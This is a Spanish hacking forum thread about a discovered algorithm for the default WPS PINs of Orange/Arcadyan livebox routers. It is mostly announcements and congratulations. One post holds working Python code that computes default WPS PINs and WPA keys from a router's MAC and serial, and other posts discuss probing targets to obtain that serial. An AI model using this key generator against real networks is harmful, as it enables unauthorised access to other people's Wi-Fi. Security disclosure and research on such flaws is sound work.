Exclusiva: Rompiendo de una vez por todas las Orange-XXXX (Pagina 1) / Estudio de algoritmos y recopilación de PIN genéricos / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 12-08-2017 17:29:22

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,523

Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Vídeos Pruebas de concepto: "Naranjas exprimidas"
Generadores de PIN por defecto redes Oarnge-XXXX en linux y Windows

En Waircut

nmkPOC (para linux)

Nos complace desde wifi-libre anunciar que hemos realizados avances decisivos en el estudio del algoritmo PIN de las livebox Orange-XXXX (ver tema Algoritmo WPS livebox 2.1 y 2.2 (orange / arcadyan))
Se trata de un trabajo que hemos empezado hace más de un año atrás ... ¡Qué alegría anunciar hoy que estamos a punto de convertir el ensayo! smile
Los modelos afectados son las livebox "blancas" y "negras"

  • Arcadyan  ARV7519RW22

  • Arcadyan  ARV7520CW2

  • Arcadyan  VRV9510KWAC23

  Podrán probar muy pronto el nuevo algoritmo en waircut (para windows) y se publicarán un código abierto bash (linux) y un tema explicativo con todos los detalles cuando estarán listos.

¡Hasta muy pronto para un nuevo full disclosure exclusivo en Wifi-libre! wink

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#2 12-08-2017 17:47:15

Koala
Very Important Usuario

Registrado: 11-09-2016
Mensajes: 462

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Bonito trabajo companeros ! smile

Desconectado

#3 12-08-2017 18:01:56

atim
Very Important Usuario

Registrado: 15-03-2015
Mensajes: 170

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Enhorabuena por vuestro estudio y trabajo, sin duda algo espectacular dar con el algoritmo de las orange-XXXX , algo que parecía imposible. plus_un

Desconectado

#4 12-08-2017 18:26:26

gump
Usuario

Registrado: 14-07-2017
Mensajes: 6

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Me quito el sombrero ante el descubrimiento. Estaré al tanto (¡como siempre!) de wifi-libre.

Desconectado

#5 12-08-2017 20:54:15

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 304

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

salu2
gracias por la noticia
esperendo al full de los que haces

Desconectado

#6 12-08-2017 22:32:55

Patcher
Very Important Usuario

Registrado: 14-01-2016
Mensajes: 399

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Algo más de un año y unas cuantas anecdotas desde que iniciamos este proyecto y apenas hace unos semanas que decidimos darle el empujón que faltaba. La perseverancia y el trabajo han dado sus frutos para poner al descubierto una nueva vulnerabilidad en nuestras redes wifi. Redes que de por si se sabe que son vulnerables desde hace mucho tiempo a un ataque por fuerza bruta.

El estudio al completo será de dominio publico como es nuestra costumbre; Entendemos que así ha de ser y no nos guardaremos nada.

No me queda más que agradecer a todos los que de una u otra forma os habeis involucrado con este proyecto. Gracias a todos.

Desconectado

#7 13-08-2017 13:54:44

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,523

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Patcher escribió:

unas cuantas anecdotas

  ¡Ya te digo!... lol  .... ¡Puto correo! wink lol 
Pero  con final feliz wink biere

Redes que de por si se sabe que son vulnerables desde hace mucho tiempo a un ataque por fuerza bruta

   
Cierto.

Desconectado

#8 13-08-2017 21:33:37

atim
Very Important Usuario

Registrado: 15-03-2015
Mensajes: 170

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Patcher escribió:

El estudio al completo será de dominio publico como es nuestra costumbre; Entendemos que así ha de ser y no nos guardaremos nada.

Sin duda esto es lo que marca la gran diferencia entre unos y otros. Lo que os moveis por los foros wifi y retroceciendo años atrás podreis intuir a que me refiero.

Desconectado

#9 14-08-2017 08:44:02

sancakoky
Usuario

Registrado: 14-08-2017
Mensajes: 7

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Gran trabajo, felicidades. Sigo el hilo esperando ansioso la publicación de waircut con el nuevo algoritmo.

Desconectado

#10 14-08-2017 10:59:13

juandiegomu
Usuario

Registrado: 31-05-2015
Mensajes: 50

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

gran trabajo,no descansais ni cuando estais en la piscina jejeje un saludo

Desconectado

#11 14-08-2017 15:20:30

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,523

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

@ sancacoky (y @ [email protected])
Patcher ha publicado ayer una nueva versión de wireless air cut que lleva el nuevo algoritmo. Tenía que hacer unas mod' y ha sacado una nueva versión.   
¡Bien hecho makina! wink
Wirelessr Air Cut versión 1.4

Desconectado

#12 15-08-2017 19:33:15

Nolose
Usuario

Registrado: 08-02-2016
Mensajes: 24

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Gran noticia compañeros!!!

El dia que publicasteis la noticia lo leí, estoy a la espera de "full discloure", a ver si la publicas ya Kcdtv, estoy bastante ansioso para leerla.

Una pregunta, según he visto en el video que has realizado Kc, he visto que primero se da la pass en binario, y de ahi ya se saca el PIN WPS.. pero..... no seria posible pasar el binario a Hexadecimal y obtener asi la pass?

Sacame de dudas!!!

Desconectado

#13 16-08-2017 00:15:26

Patcher
Very Important Usuario

Registrado: 14-01-2016
Mensajes: 399

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

@Nolose, Binario, Hexadecimal o Decimal tanto tiene, al fin y al cabo se trata sólo de distintas formas de representar una misma información, el contenido es el mismo.

Ultima edición por Patcher (16-08-2017 00:30:00)

Desconectado

#14 16-08-2017 02:12:38

Nolose
Usuario

Registrado: 08-02-2016
Mensajes: 24

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Ya lo sé Patcher, muchas gracias igualmente. Pero habitualmente estamos acostumbrados a utilizar el Hexadecimal, por eso lo he dicho,

Pero entonces.. ¿Estoy en lo correcto?

En el video de "nmkPOC", veo que primeramente se obtiene en binario la contraseña, pero... ¿esa es la contraseña del router? Eso seria el doble de descubrimiento,no tan solo el PIN WPS...

A ver si me sacáis de dudas...


Muchas gracias compañeros!!

Desconectado

#15 16-08-2017 13:27:13

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,523

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

big_smile
Nolosé... ¿Qué es lo que no entiendes en "se publicará todo en detalles este finde"? big_smile
Sobre tu idea: Es algo que puedes comprobar tu mismo pasando tu PIN a hexadecimal, Verás si te da una llave hexadecimal de 8 caracteres tongue,

Desconectado

#16 17-08-2017 15:23:19

Coronel
Usuario

Registrado: 16-08-2016
Mensajes: 13

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Felicidades, gran trabajo, esta web se está convirtiendo en una referencia en el mundillo del hackeo wifi.

Desconectado

#17 17-08-2017 21:07:04

sancakoky
Usuario

Registrado: 14-08-2017
Mensajes: 7

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Gracias por decirmelo, no sabía ni de la existencia de Air cut. Instalado y es una maravilla.

Por cierto kcdtv, he abierto un hilo pero nadie se atreve a comentar.


https://www.wifi-libre.com/topic-866-me … ac-23.html

Te lo digo por si te apetece comentar algo.

kcdtv escribió:

@ sancacoky (y @ [email protected])
Patcher ha publicado ayer una nueva versión de wireless air cut que lleva el nuevo algoritmo. Tenía que hacer unas mod' y ha sacado una nueva versión.   
¡Bien hecho makina! wink
Wirelessr Air Cut versión 1.4

Desconectado

#18 18-08-2017 13:14:48

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,523

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Por cierto kcdtv, he abierto un hilo pero nadie se atreve a comentar.

Esto no se hace en un foro wink : Se llama SPAM y está prohibido Reglas
Me he "atrevido" big_smile a participar  en tu hilo.

Desconectado

#19 15-09-2017 00:46:13

kcD4MdG2yD9r
Usuario

Registrado: 17-06-2015
Mensajes: 4

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

Well done!

Necesitais alguna mano en la automatizacion? Quizas nodejs, python3 o Go?

Saludos

Desconectado

#20 15-09-2017 07:19:59

Patcher
Very Important Usuario

Registrado: 14-01-2016
Mensajes: 399

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

@kcD4MdG2yD9r, Manos siempre hacen falta, hemos abierto un hilo para la implementación del algoritmo, si quieres puedes participar.

Bienvenido!!.

Desconectado

#21 15-09-2017 14:00:02

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,523

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

¡Hola!

Necesitais alguna mano en la automatizacion?

Bueno... Está también el tema de optimizar la recogida de las respuestas probe para obtener el serial.
Supongo que algo "from the scratch" en python sería lo suyo.

Desconectado

#22 18-09-2017 00:31:25

kcD4MdG2yD9r
Usuario

Registrado: 17-06-2015
Mensajes: 4

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

kcdtv escribió:

¡Hola!

Necesitais alguna mano en la automatizacion?

Bueno... Está también el tema de optimizar la recogida de las respuestas probe para obtener el serial.
Supongo que algo "from the scratch" en python sería lo suyo.

El generador cuesta de picar una hora maximo. El tema de las PROBE request se podrian generar usando la libreria Scapy 802.11. Otra opcion es coger la salida del programa wps que muestra el serial. (wash?)

Alguna idea mejor? Creo que Python3 es lo suyo.

Desconectado

#23 18-09-2017 02:56:54

rofl0r
Very Important Usuario

Registrado: 18-09-2017
Mensajes: 5

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

ya esta hecho

def wps_checksum(x):
	accum = 0
	t = x
	while (t):
		accum += 3 * (t % 10)
		t /= 10
		accum += t % 10
		t /= 10
	return (10 - accum % 10) % 10

# all pingens return a tuple of 3 lists:
# list 1) possible WPS pins
# list 2) possible WPA keys
# list 3) additional interesting info, like AP rate limit
def pingen_arcadyan(wps, dist=0, use_serial=False, wpa_variant=1):
	mac = wps['bssid']

	rawmac = mac.replace(':', '')
	tmp = int(rawmac, 16) + dist
	rawmac = "%012x" % tmp

	if not use_serial:

		C1 = "%.5d" % int(rawmac[-4:], 16)

		S6  = int(C1[0])
		S7  = int(C1[1])
		S8  = int(C1[2])
		S9  = int(C1[3])
		S10 = int(C1[4])

	else:
		C1 = wps['wps_serial']

		S10 = int(C1[-1:][0])
		S9  = int(C1[-2:][0])
		S8  = int(C1[-3:][0])
		S7  = int(C1[-4:][0])
		S6  = int(C1[-5:][0])


	M7  = int(rawmac[6], 16)
	M8  = int(rawmac[7], 16)
	M9  = int(rawmac[8], 16)
	M10 = int(rawmac[9], 16)
	M11 = int(rawmac[10], 16)
	M12 = int(rawmac[11], 16)

	K1 = (S7 + S8 + M11 + M12) & 0xf
	K2 = (M9 + M10 + S9 + S10) & 0xf

	X1 = K1 ^ S10
	X2 = K1 ^ S9
	X3 = K1 ^ S8
	Y1 = K2 ^ M10
	Y2 = K2 ^ M11
	Y3 = K2 ^ M12
	Z1 = M11 ^ S10
	Z2 = M12 ^ S9
	Z3 = K1 ^ K2

	# 1. original easybox wpa key
	wpakeys = []
	if wpa_variant == 1:
		wpakeys.append("%X%X%X%X%X%X%X%X%X" % (X1, Y1, Z1, X2, Y2, Z2, X3, Y3, Z3))
	elif wpa_variant == 2:
		wpakeys.append("%X%X%X%X%X%X%X%X%X%X%X%X" % (X1, Y1, Z1, S6, X2, Y2, Z2, K2, X3, Y3, Z3, K1))
	else:
		assert(False) #unknown variant

	if wpa_variant == 1:
		# 2. vodafone apparently additionally exchanges all 0s with 1s
		wpakey2 = wpakeys[0].replace('0', '1')
		if wpakeys[0] != wpakey2:
			wpakeys.append(wpakey2)

	pin = int("0x%1x%1x%1x%1x%1x%1x%1x"%(X1, X2, Y1, Y2, Z1, Z2, X3), 16) % 10000000
	pin = "%.7d%d" %(pin, wps_checksum(pin))
	return [pin], wpakeys, []

def pingen_arcadyan_orange(wps):
	a,b,c = pingen_arcadyan(wps, dist=-2, use_serial=True, wpa_variant=2)
	c = ['BRUTEFORCE -d 30', 'BUILD WPA KEY']
	return a,b,c


wps = {'wps_serial':'1234567890', 'bssid':'00:11:22:33:44:55'}
print pingen_arcadyan_orange(wps)

para usar con modo json de wash 1.6.1 (wash -j)

Desconectado

#24 18-09-2017 18:03:21

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,523

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

¡Hola!
Un placer tener tu visita r0flor smile
  Wash va muy bien para tener en tres minutos a todos los objetivos en condiciones "buenas/correctas"
Wash tiene un filtro canal y ofrece la posibilidad de aumentar el numero de probe a mandar.
Pero no permite fijar un objetivo concreto.
Para optimizar la recogida del número de serie me parece que lo optimo sería escribir algo (o encontrar la forma, he probado con wpa_cli / wpa_supplicant, no he llegado a ninguna parte) para mandar probe en bucle hacía un objetivo único.
  Sobre un router en condiciones "border line" cuesta mucho obtener la respuesta probe y estaría bien algo para machacar un PA hasta sacar su número de serie.

Desconectado

#25 18-09-2017 18:39:38

rofl0r
Very Important Usuario

Registrado: 18-09-2017
Mensajes: 5

Re: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX

kcdtv escribió:

¡Hola!
Un placer tener tu visita r0flor smile

smile
como tu no vienes mas al chat IRC, tengo ke venir yo por aqui...

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
88 7196 Hoy 02:03:37 por simoslam
13 102 Ayer 23:46:43 por ferdimam
31 4023 15-12-2017 21:05:14 por crash
9 160 14-12-2017 22:24:42 por muglio
14 245 14-12-2017 20:14:06 por crash

Pie de página

Información del usuario

Ultimo usuario registrado: juanito0707
Usuarios registrados conectados: 0
Invitados conectados: 13

Estadisticas de los foros

Número total de usuarios registrados: 807
Número total de temas: 943
Número total de mensajes: 8,313

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21